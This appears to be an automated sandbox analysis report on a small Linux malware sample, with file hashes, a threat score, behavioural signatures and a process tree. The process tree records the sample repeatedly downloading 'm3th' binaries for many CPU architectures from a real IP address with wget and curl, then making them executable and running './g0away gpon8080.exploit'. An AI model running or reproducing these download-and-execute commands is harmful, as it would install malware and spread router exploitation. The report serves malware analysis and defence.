Analysis

  • max time kernel
    86s
  • max time network
    87s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    28-07-2024 16:40

General

  • Target

    17f41b4b65e5ddad4a76594560d43927_JaffaCakes118

  • Size

    3KB

  • MD5

    17f41b4b65e5ddad4a76594560d43927

  • SHA1

    bb7691396c850ff2b4645b90336852650aa26eb6

  • SHA256

    36c3310e8853358d2d68f7b1f0ebd3b52f9691f58286799d1a7b9413903d5588

  • SHA512

    602d2b3fda5948c263ab2c48f96993daf5ef404faec82cb2e7f55eae7c8dbed3525b6715f537629d7299c3f4e43077bcf1429b81375e7b2e16f398768920b322

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 10 IoCs
  • Checks CPU configuration 1 TTPs 10 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 20 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
    /tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
    1⤵
    • Writes file to tmp directory
    PID:666
    • /usr/bin/wget
      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86
      2⤵
        PID:667
      • /usr/bin/curl
        curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x86
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        PID:672
      • /bin/cat
        cat m3th.x86
        2⤵
          PID:673
        • /bin/chmod
          chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-fd0610902d48473fb76a33ea0471cf99-systemd-timedated.service-Z1pgjC
          2⤵
            PID:674
          • /tmp/g0away
            ./g0away gpon8080.exploit
            2⤵
            • Executes dropped EXE
            PID:675
          • /usr/bin/wget
            wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips
            2⤵
              PID:677
            • /usr/bin/curl
              curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips
              2⤵
              • Checks CPU configuration
              • Reads runtime system information
              PID:680
            • /bin/cat
              cat m3th.mips
              2⤵
                PID:681
              • /bin/chmod
                chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-fd0610902d48473fb76a33ea0471cf99-systemd-timedated.service-Z1pgjC
                2⤵
                  PID:682
                • /tmp/g0away
                  ./g0away gpon8080.exploit
                  2⤵
                  • Executes dropped EXE
                  PID:683
                • /usr/bin/wget
                  wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl
                  2⤵
                    PID:685
                  • /usr/bin/curl
                    curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl
                    2⤵
                    • Checks CPU configuration
                    • Reads runtime system information
                    PID:688
                  • /bin/cat
                    cat m3th.mpsl
                    2⤵
                      PID:695
                    • /bin/chmod
                      chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                      2⤵
                        PID:696
                      • /tmp/g0away
                        ./g0away gpon8080.exploit
                        2⤵
                        • Executes dropped EXE
                        PID:697
                      • /usr/bin/wget
                        wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm
                        2⤵
                          PID:699
                        • /usr/bin/curl
                          curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm
                          2⤵
                          • Checks CPU configuration
                          • Reads runtime system information
                          PID:700
                        • /bin/cat
                          cat m3th.arm
                          2⤵
                            PID:703
                          • /bin/chmod
                            chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                            2⤵
                              PID:704
                            • /tmp/g0away
                              ./g0away gpon8080.exploit
                              2⤵
                              • Executes dropped EXE
                              PID:705
                            • /usr/bin/wget
                              wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5
                              2⤵
                                PID:707
                              • /usr/bin/curl
                                curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm5
                                2⤵
                                • Checks CPU configuration
                                • Reads runtime system information
                                PID:708
                              • /bin/cat
                                cat m3th.arm5
                                2⤵
                                  PID:709
                                • /bin/chmod
                                  chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                  2⤵
                                    PID:710
                                  • /tmp/g0away
                                    ./g0away gpon8080.exploit
                                    2⤵
                                    • Executes dropped EXE
                                    PID:711
                                  • /usr/bin/wget
                                    wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6
                                    2⤵
                                      PID:713
                                    • /usr/bin/curl
                                      curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm6
                                      2⤵
                                      • Checks CPU configuration
                                      • Reads runtime system information
                                      PID:716
                                    • /bin/cat
                                      cat m3th.arm6
                                      2⤵
                                        PID:717
                                      • /bin/chmod
                                        chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                        2⤵
                                          PID:718
                                        • /tmp/g0away
                                          ./g0away gpon8080.exploit
                                          2⤵
                                          • Executes dropped EXE
                                          PID:719
                                        • /usr/bin/wget
                                          wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7
                                          2⤵
                                            PID:721
                                          • /usr/bin/curl
                                            curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm7
                                            2⤵
                                            • Checks CPU configuration
                                            • Reads runtime system information
                                            PID:722
                                          • /bin/cat
                                            cat m3th.arm7
                                            2⤵
                                              PID:725
                                            • /bin/chmod
                                              chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                              2⤵
                                                PID:726
                                              • /tmp/g0away
                                                ./g0away gpon8080.exploit
                                                2⤵
                                                • Executes dropped EXE
                                                PID:727
                                              • /usr/bin/wget
                                                wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc
                                                2⤵
                                                  PID:729
                                                • /usr/bin/curl
                                                  curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc
                                                  2⤵
                                                  • Checks CPU configuration
                                                  • Reads runtime system information
                                                  PID:730
                                                • /bin/cat
                                                  cat m3th.ppc
                                                  2⤵
                                                    PID:733
                                                  • /bin/chmod
                                                    chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                                    2⤵
                                                      PID:734
                                                    • /tmp/g0away
                                                      ./g0away gpon8080.exploit
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:735
                                                    • /usr/bin/wget
                                                      wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k
                                                      2⤵
                                                        PID:737
                                                      • /usr/bin/curl
                                                        curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k
                                                        2⤵
                                                        • Checks CPU configuration
                                                        • Reads runtime system information
                                                        PID:738
                                                      • /bin/cat
                                                        cat m3th.m68k
                                                        2⤵
                                                          PID:741
                                                        • /bin/chmod
                                                          chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                                          2⤵
                                                            PID:742
                                                          • /tmp/g0away
                                                            ./g0away gpon8080.exploit
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:743
                                                          • /usr/bin/wget
                                                            wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc
                                                            2⤵
                                                              PID:745
                                                            • /usr/bin/curl
                                                              curl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc
                                                              2⤵
                                                              • Checks CPU configuration
                                                              • Reads runtime system information
                                                              PID:746
                                                            • /bin/cat
                                                              cat m3th.spc
                                                              2⤵
                                                                PID:747
                                                              • /bin/chmod
                                                                chmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away
                                                                2⤵
                                                                  PID:748
                                                                • /tmp/g0away
                                                                  ./g0away gpon8080.exploit
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:749
                                                                • /usr/bin/wget
                                                                  wget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i686
                                                                  2⤵
                                                                    PID:751

                                                                Network

                                                                MITRE ATT&CK Enterprise v15

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • memory/738-1-0xb6703000-0xb6714044-memory.dmp